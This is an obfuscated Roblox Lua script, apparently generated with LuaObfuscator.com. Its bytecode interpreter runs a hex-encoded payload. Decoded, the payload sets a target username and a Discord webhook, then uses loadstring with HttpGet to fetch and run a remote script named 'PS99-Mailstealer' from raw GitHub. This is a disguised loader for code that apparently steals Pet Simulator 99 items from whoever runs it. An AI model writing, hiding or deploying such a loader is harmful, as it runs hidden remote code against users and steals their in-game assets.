--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==2) then function v22() local v31=0;local v32;while true do if (v31==((621 -(555 + 64)) -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=2 -1 ;end end end v23=nil;function v23() local v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + (933 -(857 + 74)) ;return (v34 * (824 -(367 + 201))) + v33 ;end v18=3;end if (v18==4) then function v25() local v35=927 -(214 + 713) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(1 + 0)) then v38=1 + 0 ;v39=(v21(v37,878 -(282 + 595) ,36 -16 ) * ((1639 -(1523 + 114))^(10 + 19 + 3))) + v36 ;v35=5 -3 ;end if (v35==((2 + 0) -0)) then v40=v21(v37,21,1096 -(68 + 997) );v41=((v21(v37,1302 -(226 + (1816 -(201 + 571))) )==(4 -3)) and  -((2326 -(116 + 1022)) -(1069 + (491 -373)))) or (118 -(32 + 85)) ;v35=6 -3 ;end if (v35==(2 + 1 + 0)) then if (v40==(0 -0)) then if (v39==(0 + 0)) then return v41 * (957 -(892 + 65)) ;else local v98=(0 -0) -0 ;while true do if (v98==((0 -0) -0)) then v40=1 -0 ;v38=(1209 -(814 + 45)) -(87 + 263) ;break;end end end elseif (v40==(7874 -5827)) then return ((v39==(442 -(416 + 26))) and (v41 * ((181 -(67 + 113))/(0 + 0)))) or (v41 * NaN) ;end return v8(v41,v40-1023 ) * (v38 + (v39/((4 -2)^(39 + (31 -18))))) ;end if (v35==(0 -0)) then v36=v24();v37=v24();v35=(81 + 1406) -(998 + 488) ;end end end v26=nil;function v26(v42) local v43=0 -0 ;local v44;local v45;while true do if (v43==(2 + 1)) then return v6(v45);end if (v43==(886 -(261 + 624))) then v44=v3(v16,v19,(v19 + v42) -(1 -0) );v19=v19 + v42 ;v43=2;end if (v43==(1082 -(1020 + 60))) then v45={};for v77=1424 -(630 + 7 + 786) , #v44 do v45[v77]=v2(v1(v3(v44,v77,v77)));end v43=9 -6 ;end if (v43==0) then v44=nil;if  not v42 then v42=v24();if (v42==(0 -0)) then return "";end end v43=1 + 0 + (1055 -(87 + 968)) ;end end end v18=5;end if (v18==6) then v29=nil;function v29() local v46=1784 -(599 + 1185) ;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if ((1 + 0)==v46) then v49=nil;v50=nil;v46=1 + 1 ;end if (v46~=0) then else v47=0;v48=nil;v46=1 + 0 ;end if (v46==(1 + 1)) then v51=nil;v52=nil;v46=3;end if (v46==(1 + 2)) then v53=nil;while true do if (v47==(1 + 0)) then v52=v24();v53={};for v99=575 -(507 + 67) ,v52 do local v100=0;local v101;local v102;local v103;local v104;while true do if (v100~=(1750 -(1013 + 736))) then else v103=nil;v104=nil;v100=1771 -(1749 + 20) ;end if (v100==0) then v101=0;v102=nil;v100=1 + 0 ;end if (v100~=(2 + 0)) then else while true do if (v101==0) then v102=0 -0 ;v103=nil;v101=3 -2 ;end if (v101~=1) then else v104=nil;while true do if (v102==0) then local v154=1145 -(466 + 679) ;local v155;while true do if ((867 -(550 + 317))==v154) then v155=0 -0 ;while true do if (v155==(1 -0)) then v102=1;break;end if (v155==(1900 -(106 + 1794))) then v103=v22();v104=nil;v155=2 -1 ;end end break;end end end if (v102==1) then if (v103==1) then v104=v22()~=0 ;elseif (v103==2) then v104=v25();elseif (v103~=(288 -(134 + 151))) then else v104=v26();end v53[v99]=v104;break;end end break;end end break;end end end v51[1668 -(970 + 695) ]=v22();v47=1 + 1 ;end if (v47==(5 -3)) then local v97=0 -0 ;while true do if (v97~=(0 -0)) then else for v110=1991 -(582 + 1408) ,v24() do local v111=0 -0 ;local v112;local v113;local v114;while true do if ((115 -(4 + 110))==v111) then v114=nil;while true do if (v112==(0 -0)) then local v157=0;while true do if (v157==(0 -0)) then v113=1427 -(41 + 1386) ;v114=nil;v157=1825 -(1195 + 629) ;end if (v157==(1 -0)) then v112=1;break;end end end if (v112==(242 -(187 + 54))) then while true do if (v113~=(780 -(162 + 618))) then else v114=v22();if (v21(v114,1 + 0 ,1 -0 )~=(0 + 0)) then else local v163=0;local v164;local v165;local v166;local v167;while true do if ((0 -0)~=v163) then else v164=0 -0 ;v165=nil;v163=3 -2 ;end if (v163~=1) then else v166=nil;v167=nil;v163=1 + 1 ;end if (v163==(1 + 1)) then while true do if (v164==(1638 -(1373 + 263))) then if (v21(v166,66 -(30 + 35) ,1)==(1001 -(451 + 549))) then v167[2]=v53[v167[1 + 1 ]];end if (v21(v166,2,2 -0 )~=(3 -2)) then else v167[1215 -(323 + 889) ]=v53[v167[7 -4 ]];end v164=583 -(361 + 219) ;end if (v164~=(320 -(53 + 267))) then else local v168=0 -0 ;while true do if (v168~=(1385 -(746 + 638))) then else v164=414 -(15 + 398) ;break;end if (v168==(982 -(18 + 964))) then v165=v21(v114,2,2 + 1 );v166=v21(v114,4,22 -16 );v168=1 -0 ;end end end if (v164==(344 -(218 + 123))) then if (v21(v166,853 -(20 + 830) ,1584 -(1535 + 46) )~=(1 + 0)) then else v167[130 -(116 + 10) ]=v53[v167[4 + 0 ]];end v48[v110]=v167;break;end if (v164==1) then v167={v23(),v23(),nil,nil};if (v165==(0 -0)) then local v176=560 -(306 + 254) ;local v177;while true do if (v176==(0 + 0)) then v177=0;while true do if (v177~=(0 -0)) then else v167[1470 -(899 + 568) ]=v23();v167[3 + 1 ]=v23();break;end end break;end end elseif (v165==(2 -1)) then v167[3]=v24();elseif (v165==(4 -2)) then v167[3]=v24() -((4 -2)^(619 -(268 + 335))) ;elseif (v165==(293 -(60 + 230))) then local v182=0;local v183;local v184;while true do if (v182==1) then while true do if (v183==(572 -(426 + 146))) then v184=1551 -(1126 + 425) ;while true do if (v184~=0) then else v167[408 -(118 + 287) ]=v24() -((1 + 1)^(1472 -(282 + 1174))) ;v167[815 -(569 + 242) ]=v23();break;end end break;end end break;end if (v182==(377 -(142 + 235))) then v183=0 -0 ;v184=nil;v182=1 + 0 ;end end end v164=2;end end break;end end end break;end end break;end end break;end if ((977 -(553 + 424))~=v111) then else local v136=0 -0 ;while true do if (v136==(0 + 0)) then v112=0 + 0 ;v113=nil;v136=1025 -(706 + 318) ;end if (v136==(1252 -(721 + 530))) then v111=1272 -(945 + 326) ;break;end end end end end for v115=2 -1 ,v24() do v49[v115-(1 + 0) ]=v29();end v97=701 -(271 + 429) ;end if (v97~=(1 + 0)) then else return v51;end end end if ((0 + 0)==v47) then v48={};v49={};v50={};v51={v48,v49,nil,v50};v47=1 + 0 ;end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54) if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v54,16));if v20 then local v105=v5(v70,v20);v20=nil;return v105;else return v70;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v55,v56,v57,v58=v1(v16,v19,v19 + (7 -4) );v19=v19 + (8 -4) ;return (v58 * (4878682 + 11898534)) + (v57 * 65536) + (v56 * (1237 -981)) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61) local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...) local v79=v63;local v80=v64;local v81=v65;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=4) then if (v92<=1) then if (v92>0) then v89[v91[2]]();else v61[v91[3]]=v89[v91[2]];end elseif (v92<=2) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==3) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==1) then v84=(v140 + v138) -1 ;v141=0;v137=2;end if (v137==0) then v138=v91[2];v139,v140=v82(v89[v138](v13(v89,v138 + 1 ,v91[3])));v137=1;end if (2==v137) then for v159=v138,v84 do local v160=0;while true do if (v160==0) then v141=v141 + 1 ;v89[v159]=v139[v141];break;end end end break;end end else v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v61[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v61[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v61[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v61[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v61[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v61[v91[3]];end elseif (v92<=7) then if (v92<=5) then local v120=v91[2];local v121=v89[v91[3]];v89[v120 + 1 ]=v121;v89[v120]=v121[v91[4]];elseif (v92==6) then v89[v91[2]]=v61[v91[3]];else do return;end end elseif (v92<=8) then local v125;local v126,v127;local v128;v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v128=v91[2];v126,v127=v82(v89[v128](v13(v89,v128 + 1 ,v91[3])));v84=(v127 + v128) -1 ;v125=0;for v134=v128,v84 do local v135=0;while true do if (v135==0) then v125=v125 + 1 ;v89[v134]=v126[v125];break;end end end v83=v83 + 1 ;v91=v79[v83];v128=v91[2];v89[v128]=v89[v128](v13(v89,v128 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];do return;end elseif (v92>9) then local v148=v91[2];v89[v148]=v89[v148](v13(v89,v148 + 1 ,v84));else v89[v91[2]]=v91[3];end v83=v83 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68) if v68 then local v71=(v66/(2^(v67-(754 -(239 + 514)))))%(((1 -0) + 1)^(((v68-(1330 -(797 + 532))) -(v67-(1 + (0 -0)))) + 1 + 0)) ;return v71-(v71%1) ;else local v72=0 -0 ;local v73;while true do if (v72==(1202 -(373 + 829))) then v73=(733 -(476 + 255))^(v67-(1131 -(369 + 761))) ;return (((v66%(v73 + v73))>=v73) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end end end v15("LOL!0B3O0003083O00557365726E616D65030C3O0073696D70797572696873687303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313231323336303630393432353738343833322F6A655F6F624A774564635462425671684D2D6B56386E696657623453656B5956644B7771543950304E75444F676D3O4B467A4D2D4A67636C746A4748564A4D5935747803153O0073656C65637465644C6F6164696E675363722O656E03013O0034030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657200103O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00058O00013O00124O00073O00124O00083O00122O000100093O00200500010001000A0012080003000B6O000100039O0000026O000100016O00017O00",v9(),...);
